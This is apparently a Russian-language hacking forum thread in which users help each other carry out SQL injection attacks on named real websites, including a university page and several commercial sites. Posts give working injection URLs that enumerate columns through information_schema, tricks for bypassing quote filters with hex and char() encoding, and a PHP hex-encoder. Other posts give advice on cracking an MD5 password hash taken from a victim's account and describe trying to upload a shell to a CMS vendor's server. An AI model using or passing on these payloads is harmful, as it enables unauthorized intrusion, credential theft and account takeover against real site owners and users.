долго ломал голову что там))) после этого запроса все стало понятно Code: http://studorgs.bowdoin.edu/meddies/news.php?nid=10+and+substring(version(),1,1)=3/* 3 ветка,поэтому вывода нет (union введён с четвётой версии mysql) p.s там вроде 8 полей) а не 18 Code: http://studorgs.bowdoin.edu/meddies/news.php?nid=-10+order+by+8/*
Можно и так, но есть способ лучше Заходим в админку: http://www.travelwings.ru/admin/login.php Видим вверху надпись: Citrus CMS v2.0 Гуглим и находим офф сайт этой цмс: http://citrus-soft.ru Видим. что она платная, значит с кодом обламываемся , но в портфолио присутствуют ещё сайты на этом движке, и существует вероятность найти пятую ветку и посмотреть структуру базы. Удачи
Да CMS платная, но у них инъекция в этой CMS. И самое, что интересное - на их сайте MySQL крутится из под рута. Пытался залить шелл, но видно пропалили... Сейчас инъекция просто на пустую страницу вываливает. И все портфолио которые сделаны на базе этой CMS - дырявые.
Вообще-то я об этом и писал, в портфолио тоже есть и пятая ветка , и рут, но видимо админы не дремлют(я полагаю туда народ ломанулся толпой ), т.к. сейчас у меня тоже запрос не проходит
есть иньекция после insert в поле регистрации, потом форма регистрации записывается в табличку с пользователями, можно ли достроить запрос, что бы зарегистрировать юзера с правами админа? что вообще можно с этой инъекцией сделать? зарание спасибо)
Тепер вопрос . база mysql5 . но филтруеца ' .. при током запросе идёт филтер .... COLUMN_NAME,5,6 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’Users’ LIMIT 1,1+-- ww~w.so-znanie.co~m/index.php?id=-2+union+select+1,2,3+-- както обоити мозно? Помогите новичку . штоб не флюдить мозна и в ПМ
Ну тогда то что в кавычках пытаешься подать - захексируй.. в hex Вот атк PHP: <?php set_time_limit(0); $form = <<<FORM <form method="post" action=""> <textarea name="txt" rows="20" cols="100"></textarea> <input type="submit" name="ok"> </form> FORM; if ($_POST['txt'] and $_POST['ok']){ $my_url=$_POST['txt']; $strlength = strlen($my_url); for($i=0; $i<$strlength; $i++){ $returnval .= dechex(ord(substr($my_url, $i, 1))); } echo '0x' . $returnval; }else{ echo $form; } ?>
2 попугай я нечего непонел из етого пхп кода .... я нерозбераюс в нём вопше . если нетрудно мош поподробние в пм скинут и есё вопросик . где мозно раскодироват парол от логина... просто узнал парол от аккаунта а он в кодирофке 5870dc3ee770e65bb1a4a267f7c4fc6e
Это md5 расшифровать можно здесь: https://forum.antichat.ru/threadnav83865-1-10.html и здесь: https://hashcracking.info/ и здесь: http://www.google.ru/search?hl=ru&q=md5+online+cracker или с помощью ПО, рекомендую PasswordsPro от InsidePro
Подробнее: Если хотим посмотреть колонки в таблице, но кавычки фильтруются, то таблицу кодируют. Кодируем в hex. Code: http://so-znanie.com/index.php?id=-2+union+select+1,2,column_name+FROM+INFORMATION_SCHEMA.columns+where+table_name=0x61646d696e73+limit+0,1-- Где, 0x61646d696e73 - таблица admins. Закодировать можно например на этом сайте - http://x3k.ru (SQL Hex) При переводе в hex - кавычки не использовать.
можно еще через чар, получится так: Code: http://site.com/index.php?id=-2+union+select+1,2,column_name+from+information_schema.columns+profiling+where+table_name+LIKE+char(97,100,109,105,110,115)+limit+0,1-- где char(97,100,109,105,110,115) = admins
когда вверху странички пишет: /includes/configure.php. Это - потенциальный риск безопасности - пожалуйста, установите необходимые права доступа к этому файлу. что то можна зделать?
Можно ли провернуть SQL injection при ошибке следующего вида: http://beatlesfestival.net.ua/requests.php?action=reset&requestid=sql' Читал faq'и, везде используют конструкции вида +union+select+кол-во_полей-- А в данном случае, не пойму как это заюзать.